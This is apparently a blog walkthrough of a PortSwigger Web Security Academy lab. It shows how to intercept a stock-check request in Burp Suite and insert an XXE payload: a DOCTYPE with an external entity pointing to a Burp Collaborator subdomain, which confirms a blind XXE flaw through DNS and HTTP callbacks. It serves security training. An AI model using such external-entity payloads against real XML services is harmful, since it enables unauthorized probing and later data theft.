You are currently viewing Blind XXE With Out-of-Band Interaction

Blind XXE With Out-of-Band Interaction

Introduction

This is our third article on XML injection or XXE vulnerabilities. In this article, we will be solving the Blind XXE with out-of-band interaction lab. Basically, we will be using Burp Suite Collaborator for this purpose. We will be using Burp Collaborator’s payload to capture the result as we won’t be able to see the result when we send our XML payload to the server. This lab is available on the PortSwigger Web Security Academy.

Lab description Of Blind XXE With Out-of-Band Interaction

In this lab, we have a stock check feature that accepts input in XML format. The result will not be displayed. You can trigger a blind XXE vulnerability using an external domain. To do this, you need to perform an out-of-band attack using Burp Collaborator.

Lab Solution

First, we will access the lab. After accessing the lab, we will view any product. After viewing the product, there will be a stock check feature that allows us to check the stock.

Blind XXE with out-of-band interaction

The stock check feature has a button that accepts input in XML format. Upon clicking the button, we intercept the request. The request is a post-based request. After intercepting the request, we send it to the repeater tab.

<!DOCTYPE stockCheck [ <!ENTITY xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN"> ]>

In the above step, we provide a payload that helps us exploit this vulnerability.

Firstly, we go to the Burp Collaborator and copy the payload from there. After copying the payload, we insert it into the above payload. This is the most important step.

Blind XXE with out-of-band interaction

So, you can see that I have inserted the payload and forwarded it. Now, we will go to Burpsuite’s Collaborator to check if any DNS and HTTP requests have been received there

Blind XXE with out-of-band interaction

c

You can find all types of web security-related articles on our website. By visiting our site, you can gain a lot of knowledge.

Now, let’s move to the final step. Let’s check the browser response to see if the lab has been solved or not.

Blind XXE with out-of-band interaction

We have successfully solved the lab Blind XXE with out-of-band interaction. Congratulations!

To continue studying check out the next lab i.e. Blind XXE With Out-Of-Band Interaction Via XML Parameter Entities, cover the current lab before visiting the next lab. Good Luck!

Tags: , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,

Leave a Reply